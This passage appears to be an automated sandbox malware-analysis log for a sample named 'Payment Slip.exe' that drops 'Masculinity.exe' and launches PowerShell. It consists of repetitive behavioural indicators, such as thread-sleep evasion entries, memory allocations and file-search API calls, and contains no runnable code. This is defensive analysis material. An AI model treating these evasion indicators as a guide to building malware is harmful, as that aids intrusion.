          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeAPI/Special instruction interceptor: Address: 2B447A9
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeMemory allocated: 20E60000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeMemory allocated: 20C80000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599438Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598953Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598719Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598609Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598500Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598391Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598281Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598172Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598063Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597938Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597828Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597719Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597484Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597375Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597266Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597156Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597047Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596938Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596813Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596703Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596469Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596359Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596250Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596141Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596031Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595922Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595812Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595703Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595469Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595359Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595250Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595141Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595030Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 594922Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 594812Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 594703Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 594594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 594484Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7503Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2173Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeWindow / User API: threadDelayed 928Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeWindow / User API: threadDelayed 8919Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeAPI coverage: 1.0 %
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5788Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep count: 33 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -30437127721620741s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 5892Thread sleep count: 928 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 5892Thread sleep count: 8919 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -599438s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -599313s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -599188s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -599063s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -598953s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -598844s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -598719s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -598609s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -598500s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -598391s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -598281s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -598172s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -598063s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -597938s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -597828s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -597719s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -597594s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -597484s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -597375s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -597266s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -597156s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -597047s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -596938s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -596813s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -596703s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -596594s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -596469s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -596359s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -596250s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -596141s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -596031s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -595922s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -595812s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -595703s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -595594s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -595469s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -595359s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -595250s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -595141s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -595030s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -594922s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -594812s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -594703s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -594594s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748Thread sleep time: -594484s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0040276E FindFirstFileW,7_2_0040276E
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405770
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0040622B FindFirstFileW,FindClose,7_2_0040622B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599438Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 599063Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598953Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598719Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598609Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598500Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598391Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598281Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598172Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 598063Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597938Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597828Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597719Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597484Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597375Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597266Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597156Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 597047Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596938Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596813Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596703Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596469Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596359Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596250Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596141Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 596031Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595922Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595812Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeThread delayed: delay time: 595703Jump to behavior
